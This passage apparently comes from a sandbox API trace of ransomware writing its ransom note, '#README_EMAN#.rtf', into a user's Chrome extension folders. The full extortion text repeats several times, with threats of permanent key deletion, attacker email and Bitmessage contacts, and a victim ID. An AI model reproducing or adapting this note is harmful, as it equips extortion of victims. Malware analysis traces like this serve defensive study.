\\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.188] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.189] CloseHandle (hObject=0x2ec) returned 1 [0291.189] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0291.189] GetLastError () returned 0x2 [0291.189] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 